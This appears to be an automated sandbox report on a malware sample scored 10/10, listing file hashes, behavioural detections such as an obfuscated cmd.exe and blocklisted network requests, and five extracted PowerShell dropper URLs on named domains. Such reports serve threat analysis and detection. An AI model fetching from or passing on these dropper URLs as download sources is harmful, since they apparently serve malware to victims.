General

  • Target

    56934634a32985c597e2ae614d55d190_JaffaCakes118

  • Size

    68KB

  • Sample

    240518-yzhvqadc8x

  • MD5

    56934634a32985c597e2ae614d55d190

  • SHA1

    abc518e027b0f1d3735be583a06f8f376afceed6

  • SHA256

    dafe595d8dc3cf275a9d6bea2e5151d40480a2d4b0e6c020b8065fe1a7972c80

  • SHA512

    4efd15c46a470220418a60936a97991dabeaa73331a0e5a18050af62582324376cff62c548fdfa2f72a4593be2aa1daacb3a45d61c565122c6335d6dada45af5

  • SSDEEP

    768:upJcaUitGAlmrJpmxlzC+w99NBE+1o/BqbMmBktlFAO2vxwpp:uptJlmrJpmxlRw99NBE+a/SknF

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://mooremakeup.com/k

exe.dropper

http://crossroadstamp.com/0

exe.dropper

http://ntsuporte.com.br/kl5

exe.dropper

http://oooka.biz/RaQOFhRM

exe.dropper

http://parusalon.ru/idb

Targets

    • Target

      56934634a32985c597e2ae614d55d190_JaffaCakes118

    • Size

      68KB

    • MD5

      56934634a32985c597e2ae614d55d190

    • SHA1

      abc518e027b0f1d3735be583a06f8f376afceed6

    • SHA256

      dafe595d8dc3cf275a9d6bea2e5151d40480a2d4b0e6c020b8065fe1a7972c80

    • SHA512

      4efd15c46a470220418a60936a97991dabeaa73331a0e5a18050af62582324376cff62c548fdfa2f72a4593be2aa1daacb3a45d61c565122c6335d6dada45af5

    • SSDEEP

      768:upJcaUitGAlmrJpmxlzC+w99NBE+1o/BqbMmBktlFAO2vxwpp:uptJlmrJpmxlRw99NBE+a/SknF

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.

MITRE ATT&CK Enterprise v15

Tasks